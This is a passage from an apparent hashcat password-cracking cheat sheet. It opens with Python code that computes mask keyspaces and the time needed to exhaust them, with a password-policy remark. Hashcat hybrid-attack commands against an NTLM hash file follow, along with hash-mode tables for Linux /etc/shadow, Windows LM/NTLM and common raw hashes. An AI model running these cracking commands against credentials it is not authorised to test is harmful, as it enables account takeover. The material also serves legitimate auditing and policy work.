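            raise ValueError(f"dangling '?' in {spec!r}")
        name = spec[i + 1]
        if name == "?":
            chars.add("?")
        elif name in BUILTIN:
            chars.update(BUILTIN[name])
        elif name in custom:
            chars.update(custom[name])
        else:
            raise ValueError(f"unknown charset ?{name} in {spec!r}")
        i += 2
    return chars


def parse_hcmask_line(line):
    """One .hcmask line is 'custom1,custom2,...,mask' (the command-line -1/-2/... flags
    written inline). Returns (custom charsets, per-position character sets).
    Escaped commas inside a charset are not handled here."""
    parts = line.strip().split(",")
    custom = {}
    for n, spec in enumerate(parts[:-1], start=1):
        custom[str(n)] = expand(spec, custom)   # ?2 may refer to ?1, so expand in order
    mask = parts[-1]
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            positions.append(expand(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append({mask[i]})
            i += 1
    return custom, positions


def keyspace(line):
    """Number of candidates the mask line generates."""
    return math.prod(len(p) for p in parse_hcmask_line(line)[1])


def hours_to_exhaust(line, hashes_per_second):
    return keyspace(line) / hashes_per_second / 3600


if __name__ == "__main__":
    # Assumed round figure for illustration only; measure real hardware with hashcat -b.
    rate = 50_000_000_000
    for m in ["?u?l?l?l?l?l?l?l?d", "?d?s,?u?l?l?l?l?l?l?l?1", "?a?a?a?a?a?a?a?a"]:
        print(f"{m:28s} {keyspace(m):>22,d} candidates  {hours_to_exhaust(m, rate):12.2f} h")
```

The comparison the numbers make is the point for a password policy: ?u?l?l?l?l?l?l?l?d, the shape that "one capital, one digit" rules push people towards, is a few thousand times smaller than the fully random ?a?a?a?a?a?a?a?a of the same length, which is why length and unpredictability beat composition rules.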

  • Wordlist + Mask (-a 6) / Mask + Wordlist (-a 7) attack

    # The mask digits will be appended to each word of the wordlist
    hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt .\wordlist.txt ?d?d?d?d
    # The mask digits will be prepended to each word of the wordlist
    hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d .\wordlist.txt

Hashcat modes

    hashcat --example-hashes | grep -B1 -A2 "NTLM"

Cracking Linux hashes - /etc/shadow file

      500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
     3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
     7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
     1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Cracking Windows hashes

     3000 | LM                                               | Operating-Systems
     1000 | NTLM                                             | Operating-Systems

Cracking common application hashes

      900 | MD4                                              | Raw Hash
        0 | MD5                                              | Raw Hash
     5100 | Half MD5                                         | Raw Hash
      100 | SHA1                                             | Raw Hash
    10800 | SHA-384                                          | Raw Hash
     1400 | SHA-256                                          | Raw Hash
     1700 | SHA-512                                          | Raw Hash


Source: http://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247488101&idx=2&sn=05b50b3cb7b462a8a889e3c0229a29d2&chksm=fa76dd15cd0154039ab7a07c3b40f5192bf3525c24d6c5c3fb36302ae8e07377a982260e4734#rd